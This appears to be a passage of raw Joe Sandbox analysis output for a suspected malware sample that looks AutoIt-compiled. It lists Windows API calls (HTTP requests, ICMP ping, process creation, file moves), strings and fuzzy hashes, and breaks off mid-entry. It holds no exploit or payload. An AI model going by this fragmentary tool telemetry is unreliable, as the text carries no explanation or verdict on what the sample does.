                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00922BEC,?), ref: 0090846E
                                                                        • IIDFromString.OLE32(?,?), ref: 009084E1
                                                                        • VariantInit.OLEAUT32(?), ref: 0090857B
                                                                        • VariantClear.OLEAUT32(?), ref: 009085DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 2670013897-1287834457
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00905793
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 009057D8
                                                                        • gethostbyname.WSOCK32(?), ref: 009057E4
                                                                        • IcmpCreateFile.IPHLPAPI ref: 009057F2
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00905862
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00905878
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009058ED
                                                                        • WSACleanup.WSOCK32 ref: 009058F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FB4D0
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008FB546
                                                                        • GetLastError.KERNEL32 ref: 008FB550
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 008FB5BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008E9014
                                                                        • GetDlgCtrlID.USER32 ref: 008E901F
                                                                        • GetParent.USER32 ref: 008E903B
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 008E903E
                                                                        • GetDlgCtrlID.USER32(?), ref: 008E9047
                                                                        • GetParent.USER32(?), ref: 008E9063
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 008E9066
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1536045017-1403004172
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008E90FD
                                                                        • GetDlgCtrlID.USER32 ref: 008E9108
                                                                        • GetParent.USER32 ref: 008E9124
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 008E9127
                                                                        • GetDlgCtrlID.USER32(?), ref: 008E9130
                                                                        • GetParent.USER32(?), ref: 008E914C
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 008E914F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1536045017-1403004172
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008CE2A0,00000010,?,Bad directive syntax error,0091F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008EF7C2
                                                                        • LoadStringW.USER32(00000000,?,008CE2A0,00000010), ref: 008EF7C9
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • _wprintf.LIBCMT ref: 008EF7FC
                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008EF88D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString_memmove_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 2652385573-4153970271
                                                                        • Opcode ID: 04aef8d4b13a62b32def7155a1d27a00bd574540a236f827739b595c11e1d931
                                                                        • Instruction ID: 9f81408be9641b15834ea4c534e4cd6c43fe9046d37b2bee96cc74d344f067a1
                                                                        • Opcode Fuzzy Hash: 04aef8d4b13a62b32def7155a1d27a00bd574540a236f827739b595c11e1d931
                                                                        • Instruction Fuzzy Hash: 05218D3291421EEBCF12FF94CC5AEEE7738FF18304F040466F515A60A2EA71A618DB52
                                                                        APIs
                                                                        • GetParent.USER32 ref: 008E916F
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 008E9184
                                                                        • _wcscmp.LIBCMT ref: 008E9196
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008E9211
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 146a2a0e9802d3d666ecb5185a75850d618bf5c80368339f3ba9df8b35abd5eb
                                                                        • Instruction ID: c8428e083332611418fae1d709811cddae289f6d5450cd2cdf085a14dc4f20ca
                                                                        • Opcode Fuzzy Hash: 146a2a0e9802d3d666ecb5185a75850d618bf5c80368339f3ba9df8b35abd5eb
                                                                        • Instruction Fuzzy Hash: DA112C3624C39FB9FE11266ADC16DE7779CFF16724B200026FA10E40D2FFE298515555
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 009088D7
                                                                        • CoInitialize.OLE32(00000000), ref: 00908904
                                                                        • CoUninitialize.OLE32 ref: 0090890E
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00908A0E
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00908B3B
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00922C0C), ref: 00908B6F
                                                                        • CoGetObject.OLE32(?,00000000,00922C0C,?), ref: 00908B92
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00908BA5
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00908C25
                                                                        • VariantClear.OLEAUT32(?), ref: 00908C35
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: 0f029a77a6fbb2f7bc8047fc4b06b8d38691c029fe14d4e76a0f54ed20459151
                                                                        • Instruction ID: 03980336d658f85f1301fb9c0742ac3bde780bfc6d445deee96508177886c311
                                                                        • Opcode Fuzzy Hash: 0f029a77a6fbb2f7bc8047fc4b06b8d38691c029fe14d4e76a0f54ed20459151
                                                                        • Instruction Fuzzy Hash: 79C114B1608305AFD700EF68C88496BB7E9FF89358F00496DF58A9B291DB71ED05CB52
                                                                        APIs
                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 008F7A6C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafeVartype
                                                                        • String ID:
                                                                        • API String ID: 1725837607-0
                                                                        • Opcode ID: 55a5646d1b1980bf86d48c5aa42f24cf3de087e538005a009a9bd30ab2b2b8d9
                                                                        • Instruction ID: ee7a98dc6b461502f3b5016c385c100daf952442f15360e5e3dcc48e6af3dd45
                                                                        • Opcode Fuzzy Hash: 55a5646d1b1980bf86d48c5aa42f24cf3de087e538005a009a9bd30ab2b2b8d9
                                                                        • Instruction Fuzzy Hash: 0CB19071A0821E9FEB10DFA8D884BBEB7B4FF09325F244429E651E7291D734E941CB91
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0089FAA6
                                                                        • OleUninitialize.OLE32(?,00000000), ref: 0089FB45
                                                                        • UnregisterHotKey.USER32(?), ref: 0089FC9C
                                                                        • DestroyWindow.USER32(?), ref: 008D45D6
                                                                        • FreeLibrary.KERNEL32(?), ref: 008D463B
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008D4668
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 484d655420bad6a32907d8dc4db5362f82b6f3d6d7c242677750e86f27750253
                                                                        • Instruction ID: 2b5de678995959871907c1cba2a62a3e52e8d96d1a13acbb5c7094353446eaa0
                                                                        • Opcode Fuzzy Hash: 484d655420bad6a32907d8dc4db5362f82b6f3d6d7c242677750e86f27750253
                                                                        • Instruction Fuzzy Hash: 04A16A30301216CFDB29EF28D994A69B760FF15714F1842ADE90AEB262DB30EC16CF51
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,008EA439), ref: 008EA377
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: d2f26eae726bc08697052d9068ce597f9c96d794fb21258a7ee9cb1d7a4b5a36
                                                                        • Instruction ID: cdfaab727dac4c10adfb229b0689bc90e7e79705663ab7433139807c370e2477
                                                                        • Opcode Fuzzy Hash: d2f26eae726bc08697052d9068ce597f9c96d794fb21258a7ee9cb1d7a4b5a36
                                                                        • Instruction Fuzzy Hash: DE91D63060064AAACB1CEFA5C441BEEFBB4FF06704F548519E95AE3241DF317999CB92
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00892EAE
                                                                          • Part of subcall function 00891DB3: GetClientRect.USER32(?,?), ref: 00891DDC
                                                                          • Part of subcall function 00891DB3: GetWindowRect.USER32(?,?), ref: 00891E1D
                                                                          • Part of subcall function 00891DB3: ScreenToClient.USER32(?,?), ref: 00891E45
                                                                        • GetDC.USER32 ref: 008CCD32
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008CCD45
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 008CCD53
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 008CCD68
                                                                        • ReleaseDC.USER32(?,00000000), ref: 008CCD70
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008CCDFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: 1ef1ea06dbab523a0ff031743f3dd3116e3b7d3292d1ea974d40b35393d2aa04
                                                                        • Instruction ID: 734b59822d95a8b24d8c258b909126c0cdade0c30510eafc22bbdc5a99d6f7b7
                                                                        • Opcode Fuzzy Hash: 1ef1ea06dbab523a0ff031743f3dd3116e3b7d3292d1ea974d40b35393d2aa04
                                                                        • Instruction Fuzzy Hash: DA71A131504209EFCF219F64C894EEA7BB5FF49364F18426AEE5ADA266D730C881DB50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __i64tow__itow
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 1776342733-2263619337
                                                                        • Opcode ID: d6bcebfca512d0051b9aa666e53fd90a9764d9996b2ca00353793918cc874fbc
                                                                        • Instruction ID: 7f103e8f38ab645b2b51f32317275663b49e06ab2f4dbccdcf58172ae22fce4f
                                                                        • Opcode Fuzzy Hash: d6bcebfca512d0051b9aa666e53fd90a9764d9996b2ca00353793918cc874fbc
                                                                        • Instruction Fuzzy Hash: 1841A471500609AFEF24AF78D842EBA73F9FF45304F28447EE699D6392EA31D9418B11
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00901A50
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00901A7C
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00901ABE
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00901AD3
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00901AE0
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00901B10
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00901B57
                                                                          • Part of subcall function 00902483: GetLastError.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 00902498
                                                                          • Part of subcall function 00902483: SetEvent.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 009024AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 2603140658-3916222277
                                                                        • Opcode ID: 09034c2bd15ce95c40f393f29cd9a332f71d0ed2f575b10b4bd373fd252f4244
                                                                        • Instruction ID: 53ad17b3669302890e545cfbb519a82cdb10cf6f093753586bc16f9f9fdd62ca
                                                                        • Opcode Fuzzy Hash: 09034c2bd15ce95c40f393f29cd9a332f71d0ed2f575b10b4bd373fd252f4244
                                                                        • Instruction Fuzzy Hash: 73415CB1601218BFEB129F50CC99FFB7BACEF08354F00812AF9059A195E7749E449BA4
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0091F910), ref: 00908D28
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0091F910), ref: 00908D5C
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00908ED6
                                                                        • SysFreeString.OLEAUT32(?), ref: 00908F00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: edcdd42cbf89bab30ce86bf12865859e109c48dc0846fd3a5e067c69a2029aed
                                                                        • Instruction ID: b833199c9fdf6ea328e82b6ada10e8f50c7d0d9d322f9ead6a9345c23e37ce53
                                                                        • Opcode Fuzzy Hash: edcdd42cbf89bab30ce86bf12865859e109c48dc0846fd3a5e067c69a2029aed
                                                                        • Instruction Fuzzy Hash: 91F13B71A00219EFDF14EF98C884EAEB7B9FF45314F148498F945AB291DB31AE46CB50
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090F6B5
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090F848
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090F86C
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090F8AC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090F8CE
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0090FA4A
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0090FA7C
                                                                        • CloseHandle.KERNEL32(?), ref: 0090FAAB
                                                                        • CloseHandle.KERNEL32(?), ref: 0090FB22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: 3142b957d92f5ff490fb07705636618369f03b9c3ff5db83d90828590ca7ac1c
                                                                        • Instruction ID: ae109f6e1619b4f7efe31a916429894ef75f31da09eb2252d34566aee038a261
                                                                        • Opcode Fuzzy Hash: 3142b957d92f5ff490fb07705636618369f03b9c3ff5db83d90828590ca7ac1c
                                                                        • Instruction Fuzzy Hash: 8CE1C3312043009FCB24EF28C491B6ABBE5FF85354F18896DF8999B6A2DB30DD45CB52
                                                                        APIs
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008F3697,?), ref: 008F468B
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008F3697,?), ref: 008F46A4
                                                                          • Part of subcall function 008F4A31: GetFileAttributesW.KERNEL32(?,008F370B), ref: 008F4A32
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 008F4D40
                                                                        • _wcscmp.LIBCMT ref: 008F4D5A
                                                                        • MoveFileW.KERNEL32(?,?), ref: 008F4D75
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: 2c69cec17f51469b3e6d7c60800701a828d63ce4825d07b1804ad9bd4c19e6c5
                                                                        • Instruction ID: 0a4c56bc98863c417c612913c385d56fe73bd8daebec099de7aef892b7a42247
                                                                        • Opcode Fuzzy Hash: 2c69cec17f51469b3e6d7c60800701a828d63ce4825d07b1804ad9bd4c19e6c5
                                                                        • Instruction Fuzzy Hash: 405143B21083499BC725EB64D8819EB77ECFF84350F10192FF289D3152EE34A688C766
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009186FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 51e0e0c6f584655693fdf10be31df02e1d6cb73bfec073738fd08ac489a9ec03
                                                                        • Instruction ID: 3da641ca0a46ee88d57ef981af53864a87b5c058086e4cde47bef200f760c394
